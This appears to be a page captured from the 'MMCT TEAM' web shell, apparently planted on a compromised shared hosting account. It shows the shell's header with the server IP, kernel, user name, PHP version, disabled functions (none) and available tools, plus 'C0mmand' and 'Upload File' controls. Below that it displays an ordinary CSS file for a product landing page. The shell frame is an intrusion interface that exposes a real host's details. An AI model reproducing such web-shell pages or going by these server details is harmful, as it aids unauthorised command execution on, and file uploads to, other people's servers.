MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.68
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/imyrqtmy/public_html/ssv/cgsurveynew/assets/css/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/ssv/cgsurveynew/assets/css/delta.css
.delta-hero .delta-hero-img{
    height: 100vh;
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    background: url(../img/products/delta/Ig-Delta-Background.webp) lightgray 0px 0px / 100% 119.138% no-repeat;
}

.delta-hero-title{
    position: relative;
    top: 15%;
    background: linear-gradient(0deg, rgba(148, 180, 206, 0.61) 0%, #202D3A 112.87%);
    background-clip: text;
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
    font-size: 6vw;
    font-style: normal;
    font-weight: 400;
    line-height: normal;
}

.delta-hero-igd{
    position: relative;
    top:19%;
    font-size: 1.7vw;
}
.delta-hero-image{
    position: relative;
    top: -2%;
    width: 50vw;
}

.delta-hero-slogan{
    position: relative;
    top: 0%;
    color: white;
    font-style: italic;
    font-weight: 600;
    font-size: 1.4vw;
}

.delta-videobox{
    border-radius: 20px; 
    width:29vw; height: 34.7vw;  
    background: black;
    z-index: -1;
}

@media screen and (min-width: 992px){ 
    .delta.delta-description-text{
        font-size: 1.05vw !important;
    }
}


@media screen and (max-width: 1637px) and (max-height: 400px){ 
    .delta-hero-title{
        top: 13%;
        font-size: 13vw;
    }

    .delta-hero-image{
        width: 70vw;
    }

    .delta-hero-igd{
        top: 21%;
        font-size: 3vw;        
    }

    .delta-hero-slogan{
        font-size: 2vw;
    }
}


@media screen and (min-height: 1097px) {
    .delta-hero-title{
        font-size: 9vw;
    }
    .delta-hero-igd{
        font-size: 2.3vw;
    }
    .delta-hero-image{
        width: 75vw;
    }
    .delta-hero-slogan{
        font-size: 1.3vw;
    }
}


@media (max-width: 992px) {
    .delta-hero .delta-hero-img{
        background: url(../img/products/delta/Ig-Delta-Background-Medium.webp) lightgray 0px 0px / 100% 119.138% no-repeat;
    }

    .delta-hero-content-group{
        position: relative;
        top: -5%;
    }

    .delta-hero-igd{
        font-size: 3.7vw;
    }

    .delta-hero-title{
        font-size: 10vw;
    }
    .delta-hero-image{
        width: 85vw;
    }

    .delta-hero-slogan{
        font-size: 2.3vw;
    }

    .delta-videobox{
        width: 89vw; 
        height: 54.6vw;  
    }
}

@media (max-width: 768px) {
    .delta-hero .delta-hero-img{
        background: url(../img/products/delta/Ig-Delta-Background-Small.jpg) lightgray 0px 0px / 100% 119.138% no-repeat;
    }
    .delta-hero-title{
        font-size: 16vw;
    }
    .delta-hero-igd{
        font-size: 4.5vw;
    }
    .delta-hero-image{
        width: 80vw;
    }

    .delta-hero-slogan{
        text-align: center;
        font-size: calc(6px + 3vw);
        padding: 0 3% 0 3%;
    }
    
    .delta-hero-content-group{
        position: relative;
        top: -15%;
    }

    .delta-videobox{
        height: 117.8vw;  
    }

}

@media screen and (min-width: 1920px) {
    .delta-hero-title{
        font-size: 173px;
    }
    .delta-hero-igd{
        font-size: 45px;
    }
    .delta-hero-image{
        width: 1440px;
    }

    .delta-hero-slogan{
        font-size: 25px;
    }
}


/* Client css */
   
.simulator-clients-container {
    display: flex;
    flex-direction: column;
    align-items: center;
    padding: 40px;
    width: 100%;
    font-family: Arial, sans-serif;
}

.simulator-clients-title {
    color: black;
    font-size: 2.25rem;
    line-height: 2.5rem;
    font-weight: 500;
    margin-bottom: 20px;
}

.simulator-client-logos {
    display: flex;
    overflow: hidden; 
    width: 100%;
}

.simulator-client-logos-content {
    display: flex;
    animation: scroll 20s linear infinite;
}

.simulator-client-logo {
    flex: 0 0 auto; 
    width: 18%; 
    margin-right: 40px;
}

@keyframes scroll {
    from {
        transform: translateX(0);
    }
    to {
        transform: translateX(-100%);
    }
}

@media (min-width: 768px) { 
    .simulator-client-logo {
        width: 22%;
    }
}

@media (min-width: 1024px) { 
    .simulator-client-logo {
        width: 10%;
    }
}

@media (min-width: 1280px) { 
    .simulator-client-logos {
        gap: 20px;
    }
}


.delta-modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    padding-top: 100px; /* Location of the box */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.delta-modal-content {
    background-color: #fefefe;
    margin: auto;
    top: 4vw;
    padding: 20px;
    border: 1px solid #888;
    width: 80%;
    max-width: 600px;
    position: relative;
    border-radius: 1.6vw;
}

/* The Close Button */
.delta-close {
    color: #aaa;
    float: right;
    font-size: 28px;
    font-weight: bold;
    position: absolute;
    top: 10px;
    right: 20px;
}

.delta-close:hover,
.delta-close:focus {
    color: black;
    text-decoration: none;
    cursor: pointer;
}

/* Flex container for text and image */
.delta-modal-row {
    display: flex;
    align-items: center;
    justify-content: space-between;
}

/* Modal text */
.delta-modal-text {
    font-size: 18px;
    margin-left: 20px;
}

/* Image inside modal */
.delta-modal-content-img {
    max-width: 20%;
    height: auto;
    flex-shrink: 0;
    width: auto; /* Maintain aspect ratio */
}

.delta-phone-number {
    font-size: 1.4vw;
    color: rgb(56,172,236);
    font-weight: bold;
    padding-top: 1vw;
}

.delta-modal-products-inline-group {
    display: flex;
    flex-wrap: wrap;
    gap: 20px;
    margin-top: 10px;
}

.delta-modal-products-form-group {
    flex: 1;
    min-width: calc(50% - 10px);
    margin-bottom: 15px;
}

@media (max-width: 768px) {
    .delta-modal-text, .delta-phone-number {
        font-size: 4vw; /* Adjust font size for smaller screens */
    }

    .delta-modal-content-img {
        max-width: 20%; /* Adjust image size for smaller screens */
    }

    .delta-close {
        font-size: 5vw;
        top: 2vw;
        right: 3vw;
    }

}

@media(max-width: 1024px){
    .delta-phone-number {
        font-size: 4vw !important;
        padding-top: 2vw;
    }

    .delta-modal-text {
        font-size: 3vw !important;
    }
}

MMCT - 2023